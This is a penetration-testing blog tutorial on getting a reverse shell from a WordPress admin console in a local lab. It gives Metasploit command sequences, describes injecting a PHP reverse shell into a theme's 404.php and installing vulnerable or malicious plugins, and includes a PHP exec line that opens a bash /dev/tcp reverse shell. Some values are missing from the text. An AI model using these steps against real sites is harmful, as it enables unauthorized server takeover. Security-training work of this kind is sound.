Penetration Testing

WordPress: Reverse Shell

This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already setup WordPress in our local machine but if you want to learn WordPress installation and configuration then visit the link given below.

As we all know wpscan is a standalone tool for identifying vulnerable plugins and themes of WordPress, but in this post, we are not talking wpscan tutorial.

Table of Content

  • Metasploit Framework
  • Injecting Malicious code in WP_Theme
  • Upload Vulnerable WP_Pulgin
  • Inject Malicious Plugin


Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: admin: admin (in our case)

Let’s begin!!

As you can observe that I have access of WordPress admin console over the web browser, for obtaining web shell we need to exploit this CMS. There are multiple methods to exploit WordPress, let’s go for some operations.

Metasploit Framework

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as a result, it will give meterpreter session of the webserver.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

Great!! It works wonderfully and you can see that we have owned the reverse connection of the web server via meterpreter session.

Injecting Malicious code in WP_Theme

There’s also a second technique that lets you spawn web server shells. If you have a username and password for the administrator, log in to the admin panel and inject malicious PHP code as a wordpress theme.

Login into WP_dashboard and explore the appearance tab.

Now go for theme twenty fifteen chose the templet into 404.php

You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver.

Now, to proceed further, we used the reverse shell of PHP (By Penetstmonkey). And then we copied the above php-reverse-shell and paste it into the 404.php wordpress template as shown in the picture below. We have altered the IP address to our present IP address and entered any port you want and started the netcat listener to get the reverse connection.


Update the file and browse the following URL to run the injected php code.

you will have your session upon execution of 404.php file. Access netcat using the following command:

Upload Vulnerable WP_Plugin

Some time logon users do not own writable authorization to make modifications to the WordPress theme, so we choose “Inject WP pulgin malicious” as an alternative strategy to acquiring a web shell.

So, once you have access to a WordPress dashboard, you can attempt installing a malicious plugin. Here I’ve already downloaded the vulnerable plugin from exploit db.

Click here to download the plugin for practice.

Since we have zip file for plugin and now it’s time to upload the plugin.

Dashboard > plugins > upload plugin

Browse the downloaded zip file as shown.

Once the package gets installed successfully, we need to activate the plugin.

When everything is well setup then go for exploiting. Since we have installed vulnerable plugin named “reflex-gallery” and it is easily exploitable.

You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute the following command:

use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts
set targeturi /wordpress

As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a WordPress platformed website.

Inject Malicious Plugin

As you have seen above that we have uploaded the vulnerable plugin whose exploit is available. But this time we are going to inject our generated malicious plugin for obtain reverse shell.

This is quite simple as we have saved malicious code for reverse shell inside a php file named “revshell.php” and compressed the file in zip format.

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'")

Again, repeat the same step as done above for uploading plugin “” file and start netcat listener to obtain the reverse connection of the target machine.

Once the package gets installed successfully, we need to activate the plugin.

As soon as you will activate the plugin it will through the reverse connection as netcat session.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

5 thoughts on “WordPress: Reverse Shell

  1. If someone have already admin password then what is need to hack that website. How can one should inject that code without having admin access

Comments are closed.